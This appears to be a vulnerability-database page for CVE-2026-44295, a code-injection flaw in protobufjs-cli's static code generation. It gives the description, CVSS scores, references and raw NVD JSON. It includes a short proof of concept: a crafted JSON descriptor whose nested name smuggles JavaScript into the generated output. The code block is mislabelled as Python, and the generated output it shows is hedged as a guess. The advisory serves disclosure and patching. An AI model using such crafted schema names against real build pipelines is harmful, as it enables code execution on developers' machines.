CVE-2026-44295

Description

protobufjs-cli is the command line add-on for protobuf.js. Prior to 1.2.1 and 2.0.2, pbjs static code generation could emit unsafe JavaScript identifiers derived from schema-controlled names. When generating static JavaScript from a crafted schema or JSON descriptor, certain namespace, enum, service, or derived full names could be written into the generated output without sufficient sanitization. This vulnerability is fixed in 1.2.1 and 2.0.2.

CVSS Details

CVSS Score

8.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

protobufjs-cli < 1.2.1

protobufjs-cli < 2.0.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Malicious JSON descriptor example demonstrating the injection
const MaliciousDescriptor = {
  "nested": {
    "SafeNamespace": {
      "nested": {
        // Identifier containing malicious JavaScript syntax
        "MaliciousField; console.log('CVE-2026-44295 Exploited'); //": {
          "fields": {
            "id": { "type": "string", "id": 1 }
          }
        }
      }
    }
  }
};

// When processed by vulnerable pbjs (e.g., pbjs -t static-module malicious.json > output.js):
// The generated output.js might look like:
// $root.SafeNamespace.MaliciousField; console.log('CVE-2026-44295 Exploited'); // = (function() {
//   ...
// })();

// Requiring the generated file executes the injected code
// require('./output.js');

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44295
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44295
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44295/
[4] VulDB https://vuldb.com/cve/CVE-2026-44295
[5] https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-6r35-46g8-jcw9

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44295", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:56.507", "lastModified": "2026-05-13T17:01:38.423", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "protobufjs-cli is the command line add-on for protobuf.js. Prior to 1.2.1 and 2.0.2, pbjs static code generation could emit unsafe JavaScript identifiers derived from schema-controlled names. When generating static JavaScript from a crafted schema or JSON descriptor, certain namespace, enum, service, or derived full names could be written into the generated output without sufficient sanitization. This vulnerability is fixed in 1.2.1 and 2.0.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-6r35-46g8-jcw9", "source": "[email protected]"}]}}